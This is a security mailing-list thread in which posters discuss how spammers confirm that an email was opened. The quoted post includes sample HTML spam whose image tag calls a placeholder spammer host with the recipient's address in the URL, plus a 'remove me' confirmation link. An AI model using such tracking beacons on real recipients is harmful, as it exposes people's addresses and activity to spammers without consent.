Re: spam technique name?

[tetsujin () attbi com]

The new trick is to use HTML. By using it, they can link/encode the html 
request for graphics from a server therefor linking your email address.
> Hello all
>
> Recently I was thinking about a technique that could be used by spammers, I 
> don't know a common name or something for such a technique, so if you know it 
> please let me know.
>
> PROBLEM
>       How can a spammer know if the victim opened the mail?, one is the well 
> known "Remove Me" link which, in fact, will confirm user read the message (and 
> probably will be bombed with many more, now that he said "hey!, I'm here").  
> However, it requires user interaction.
>
> SOLUTION
>       A simple "solution" can be to insert a Image, Link (for CSS for example) 
> or Script tag in the HTML mail, all those elements indicate Web browsers to send 
> a GET request using the SRC or HREF attribute, without user interaction. 
>
> Sample Code (Mail sent to ficticious peter () foomail com)
> <HTML>
> <BODY>
>       Dear Peter<br>
>       Buy our brand new product, CHEAP, CHEAP, CHEAP....
>       <img 
> src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom&apos;><b
> r>
>       Click <a href='http://www.spamer.com/ConfirmVictim.php&apos;>Here</a> to be 
> removed<br>
>       NOTE:the presence of this link indicates this is not spamming even if 
> you don't ask for this email
> </BODY>
> </HTML>
>
> Viewing (or "previewing" in Outlook or similar) this email will automatically 
> send a request for a "image" file served by a Server-side script, first 
> recording the data without explicit authorization.
>
> I've tested this (using 3 different tags) using Exchange and some others public 
> accounts. I have succeed in all cases.
>
> So have you seen something similar? do you think this is a kind of XSS? I do.
>
> cheers :)
> ________________________________________
> Juan C Calderon
> IT Security